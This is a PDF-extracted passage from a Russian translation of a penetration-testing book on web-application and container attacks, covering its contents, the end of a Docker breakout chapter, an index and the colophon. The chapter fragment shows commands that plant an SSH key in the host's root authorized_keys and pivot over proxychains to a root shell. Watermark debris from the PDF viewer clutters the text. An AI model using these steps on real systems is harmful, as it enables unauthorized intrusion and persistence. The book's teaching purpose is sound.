- •Отзывы и пожелания
- •Список опечаток
- •Нарушение авторских прав
- •Предисловие
- •Кому адресована эта книга
- •О чем идет речь в книге
- •Как извлечь максимум из книги?
- •Загрузка примеров
- •Загрузка цветных изображений
- •Условные обозначения
- •Атаки на веб-приложения. Введение
- •Правила применения оружия
- •Вопросы конфиденциальности данных
- •Очистка
- •Инструментарий тестировщика
- •Kali Linux
- •Альтернативы Kali Linux
- •Прокси-сервер
- •Burp Suite
- •Zed Attack Proxy
- •Облачная инфраструктура
- •Дополнительные источники
- •Упражнения
- •Резюме
- •Глава 2
- •Эффективное обнаружение
- •Типы тестирования
- •Построение карты сети
- •Masscan
- •hatWeb
- •Nikto
- •CMS-сканеры
- •Эффективная атака методом полного перебора
- •Средства сканирования
- •Постоянное картирование контента
- •Обработка полезной нагрузки
- •«Полиглот»
- •Запутывание (обфускация) кода
- •Дополнительные источники
- •Упражнения
- •Резюме
- •Глава 3
- •Легкая добыча
- •Анализ сети
- •Ищем вход
- •Определение учетных данных
- •Есть способ получше
- •Очистка
- •Дополнительные ресурсы
- •Резюме
- •Глава 4
- •Продвинутые способы атаки с использованием метода полного перебора
- •Распыление подбора пароля
- •Спросим LinkedIn
- •Метаданные
- •Кассетная бомба
- •За семью прокси-серверами
- •ProxyCannon
- •Резюме
- •Глава 5
- •Внедрение файлов
- •Удаленное внедрение файлов
- •Локальное внедрение файлов
- •Внедрение файла для удаленного выполнения кода
- •Резюме
- •Обнаружение и эксплуатация уязвимостей в приложениях с помощью внешних сервисов
- •Распространенный сценарий
- •Командно-контрольный сервер
- •Центр сертификации Let’s Encrypt
- •INetSim
- •Подтверждение
- •Асинхронное извлечение данных
- •Построение выводов на основе анализа данных
- •Резюме
- •Расширение функциональных возможностей Burp Suite
- •Нелегальная аутентификация и злоупотребление учетными записями
- •Швейцарский нож
- •Запутывание кода
- •Collaborator
- •Открытый сервер
- •Выделенный сервер Collaborator
- •Резюме
- •Глава 8
- •Вредоносная сериализация
- •Использование десериализации
- •Атака на пользовательские протоколы
- •Анализ протокола
- •Эксплойт для осуществления атаки
- •Резюме
- •Практические атаки на стороне клиента
- •Правила ограничения домена
- •Совместное использование ресурсов разными источниками
- •Межсайтовый скриптинг
- •Постоянный XSS
- •DOM-модели
- •Межсайтовая подделка запроса
- •BeEF
- •Перехват
- •Атаки с применением методов социальной инженерии
- •Кейлоггер
- •Закрепление в системе
- •Автоматическая эксплуатация
- •Туннелирование трафика
- •Резюме
- •Практические атаки на стороне сервера
- •Внутренние и внешние ссылки
- •Атаки XXE
- •Атака billion laughs
- •Подделка запроса
- •Сканер портов
- •Утечка информации
- •«Слепой» XXE
- •Удаленное выполнение кода
- •Резюме
- •Глава 11
- •Атака на API
- •Протоколы передачи данных
- •SOAP
- •REST
- •Аутентификация с помощью API
- •Базовая аутентификация
- •Ключи API
- •Токены на предъявителя
- •Postman
- •Установка
- •Вышестоящий прокси-сервер
- •Среда выполнения
- •Коллекции
- •Запуск коллекции
- •Факторы атаки
- •Резюме
- •Глава 12
- •Атака на CMS
- •Оценка приложения
- •WPScan
- •sqlmap
- •Droopescan
- •Arachni
- •Взлом кода с помощью бэкдора
- •Закрепление в системе
- •Утечка учетных данных
- •Резюме
- •Глава 13
- •Взлом контейнеров
- •Сценарий уязвимости в Docker
- •Осведомленность о ситуации
- •Взлом контейнера
- •Резюме
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
||
|
|
|
C |
|
E |
|
|
|
|
|
|
C |
E |
|
|
|
|||||||
|
|
X |
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
||||||
|
- |
|
|
|
|
|
d |
|
|
- |
|
|
|
|
|
d |
|
||||||
|
F |
|
|
|
|
|
|
|
t |
|
|
F |
|
|
|
|
|
|
|
t |
|
||
|
D |
|
|
|
|
|
|
|
|
i |
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
r |
||||
P |
|
|
|
|
|
NOW! |
o |
P |
|
|
|
|
|
NOW! |
o |
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
BUY |
|
|
Резюме 377 BUY |
|
|
|||||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||
w Click |
to |
|
|
|
|
|
|
|
|
|
|
|
to |
|
|
|
|
|
|
||||
|
|
|
|
|
|
|
m |
w Click |
|
|
|
|
|
|
|
m |
|||||||
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
||
|
w |
|
|
|
|
|
|
|
|
o |
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
g |
.c |
|
|
. |
|
|
|
|
g |
.c |
|
||||||
|
|
p |
|
|
|
|
|
|
|
|
|
p |
|
|
|
|
|
|
|
||||
|
|
|
df |
|
|
|
|
e |
|
|
|
|
|
|
|
|
|
e |
|
||||
|
|
|
|
|
biBldmVudHVhbGx5IG9uZSBvZiB0aGVtIGxvb2tzIG92ZXIgYXQgdGhlIG90aGVyIGFuZCBnb |
n |
|
|
|
|
|||||||||||||
|
|
|
|
|
n |
|
|
|
|
|
|
|
df |
|
|
|
|
|
|
||||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
-x cha |
|
|
|
|
|
2VzLCAiV2hhdCB0aGUgaGVsbCBpcyB3YXRlcj8gIg== sensible@ansible" >> /host/root/.ssh/authorized_keys
Из подконтрольного нам контейнера можем выполнитьповоротс помощью сеанса Meterpreter, войти в сеть контейнера и пройти аутентификацию в SSHслужбе 172.18.0.1, которая, как мы ранее подозревали, основываясь на результатах сканирования nmap, принадлежит хосту.
root@kali:~# proxychains ssh root@172.18.0.1 -i ~/.ssh/id_rsa ProxyChains-3.1 (http://proxychains.sf.net) |S-chain|-<>-127.0.0.1:1080-<><>-172.18.0.1:22-<><>-OK
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-128-generic x86_64)
root@vulndocker:~# id
uid=0(root) gid=0(root) groups=0(root)
Резюме
Уконтейнеров есть множество преимуществ, поэтому они – важная тема. Docker произвел настоящую революцию в плане обработки образов кон-
тейнеров и их развертывания. Будучи авторами вредоносных программ, мы должны рассматриватьвсе новыетехнологии с позиции хакера.Как можно это взломать и как использовать, чтобы получить доступ, которого у нас не было раньше?
Если бизнес переходитс виртуальных машин на контейнеры в надежде снизить затраты,предполагая,что они обеспечивают одинаковую защиту,компанияподвергаетсяперекрестныматакам,которыепреждебылитрудноосущест вимыми, если не невозможными.
В этой главе мы увидели, что компрометация простой CMS, использующей контейнеры, привела к доступу к другому контейнеру, что в итоге полностью скомпрометировало хост. Это не означает, что следует избегать Docker и его контейнеров, но, как и любое иное программное обеспечение, Docker нужно надежно настроить перед развертыванием. Уязвимый или неправильно настроенный контейнер позволит злоумышленникам перейти к другим, более важным приложениям или,что еще хуже, к хосту.
Мы также рассмотрели опасности развертывания приложений с использованием небезопасных контейнерных сетей. Нам удалось скомпрометировать приложение, и, оказавшись внутри, мы успешно развернулись по сети Docker, получив доступ к другим контейнерам и в конечном итоге скомпрометировав сам хост.
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
||
P |
|
|
|
|
|
NOW! |
o |
|
|||
|
|
|
|
|
|
|
|
||||
|
|
p |
|
|
|
|
|
указатель |
|||
|
|
|
to |
BUY |
Предметныйg |
||||||
|
|
|
|
|
|
|
|
|
|
||
w Click |
|
|
|
|
|
m |
|
||||
|
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
|
. |
|
|
|
|
|
.c |
|
|
||
|
|
|
df |
|
|
n |
e |
|
|
||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
А
АтакиXXE 253
П
Правило ограничения домена 209, 210, 211
A
Arachni 324, 325, 326, 327, 349
B
BApp Store 156, 157, 159, 163, 291
Burp Collaborator 25, 155, 173, 256, 257, 270
Burp Suite 25, 26, 28, 29, 42, 43, 45, 49,
50, 57, 97, 101, 104, 106, 112, 155, 156, 159, 163, 172, 173, 174, 176, 179, 184, 261, 293, 295, 314
C
CDNJS 212
Composer 170, 194
CyberChef 245, 267, 268, 273, 335, 336
D
DeserLab 195, 197, 198, 200, 202, 205 DigitalOcean 27, 29, 138
Docker 13, 280, 296, 350, 351, 352, 353,
354, 362, 365, 366, 367, 370, 371, 372, 373, 374, 375, 376, 377
Docker-SSH 372, 373, 374, 375 droopescan 39, 322, 323
Drupal 38, 39, 313, 314, 322, 324, 327, 349
E
ElevenPaths 96
F
FuzzDB 40, 69
G
Gobuster 42, 44, 45, 69
I
Intruder 25, 42, 43, 49, 50, 51, 53, 54, 55,
57, 59, 97, 98, 99, 101, 106, 107, 155, 176, 283, 296, 310
J
Joomla 38, 39, 313, 314, 322, 324, 327, 349
JoomScan 39
JRuby 156, 157
JWT4B 293, 294, 295
JWTRFC 291
Jython 156, 157, 199
K
Kali Linux 23, 24, 33, 37, 42, 43, 44, 75,
77, 83, 223, 370
L
LDAP 90, 91, 287
Linode 27, 29
N
Nikto 37, 38, 41, 69
Nmap 33, 34, 35, 37, 40, 41, 69, 71, 72,
73, 75, 88, 371
P
Packagist 194
Postman 295, 296, 297, 298, 299, 300, 302,
306, 307, 312
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
|
|
ProxyCannon |
||||
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
S
109, 110, 111, 112, 113, 114
SOAP 253, 281, 282, 283, 284, 287, 288, 312
SQLMapper 163, 165
SQL-инъекция 172, 173, 220, 321, 325
T
Tor 89, 102, 103, 104, 105, 106, 107, 108,
109, 113
Torsocks 103
W
Weevely 82, 83, 84, 85, 86, 87, 359, 361, 3
63, 364, 366, 368
WhatWeb 37, 69
Предметный указатель
Wireshark 197, 198
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
C |
E |
|
|
|||
|
|
X |
|
|
|
|
|||
|
- |
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
||||
379 BUY |
|
|
|||||||
|
|
|
|
|
|||||
w Click |
to |
|
|
|
|
m |
|||
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
g |
|
|
|
|
|
|
df |
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
WordPress 38, 39, 264, 313, 314, 322, 324,
326, 327, 328, 329, 331, 336, 339, 343, 344, 345, 346, 349, 354, 356, 357, 359, 360, 366
WPScan 39, 68, 69, 314, 315, 317, 318, 322,
327, 328, 329, 349
X
XSS 17, 22, 60, 62, 66, 68, 69, 116, 131,
134, 137, 149, 176, 177, 208, 210, 214, 215, 216, 217, 218, 219, 222, 223, 226, 227, 228, 229, 231, 234, 236, 240, 242, 243, 247, 249, 310, 325
Z
ZedAttackProxy 26
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
||
|
|
|
C |
|
E |
|
|
|
|
|
|
|
C |
|
E |
|
|
|
||||||
|
|
X |
|
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
||||||
|
- |
|
|
|
|
|
d |
|
|
|
- |
|
|
|
|
|
d |
|
||||||
|
F |
|
|
|
|
|
|
|
t |
|
|
F |
|
|
|
|
|
|
|
t |
|
|||
|
D |
|
|
|
|
|
|
|
|
i |
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
r |
||||
P |
|
|
|
|
|
NOW! |
|
o |
P |
|
|
|
|
|
NOW! |
o |
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
BUY |
|
|
|
|
|
|
|
|
BUY |
|
|
||||||||
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
|
|
to |
|
|
|
|
|
|
||
w Click |
|
|
|
|
|
|
|
m |
w Click |
|
|
|
|
|
|
m |
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
||
|
w |
|
|
|
|
|
|
|
|
|
o |
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
df-xchan |
|
.c |
|
|
. |
|
|
|
|
|
|
.c |
|
|||||||||
|
|
p |
|
|
|
Книги издательства «ДМК Пресс» можно заказать в торгово-издательском холдингеdf-x chan |
|
|
|
|
||||||||||||||
|
|
|
|
|
|
g |
|
|
|
|
|
|
p |
|
|
|
|
g |
|
|
|
|||
|
|
|
|
|
|
|
|
e |
|
|
|
|
|
|
|
|
|
|
e |
|
«Планета Альянс» наложенным платежом, выслав открытку или письмо по почтовому адресу: 115487, г. Москва, 2-й Нагатинский пр-д, д. 6А.
При оформлении заказа следует указать адрес (полностью), по которому должны быть высланы книги; фамилию, имя и отчество получателя. Желательно также указать свой телефон и электронный адрес.
Эти книги вы можете заказать и в интернет-магазине: www.a-planeta.ru.
Оптовые закупки: тел. +7 (499) 782-38-89. Электронный адрес: books@alians-kniga.ru.
Эдриан Прутяну
Как стать хакером
Сборник практических сценариев, позволяющих понять, как рассуждает злоумышленник
Главный редактор |
Мовчан Д. А. |
dmkpress@gmail.com |
|
Перевод с английского |
Беликов Д. А. |
Редактор |
Белявский Д. М. |
Корректор |
Юрьева В. М, Синяева Г. И. |
Верстка |
Паранская Н. В. |
Дизайн обложки |
Мовчан А. Г. |
Формат 70×100 1/16.
Печать цифровая. Усл. печ. л. 27,79. Тираж 200 экз.
Веб-сайт издательства: www.dmkpress.com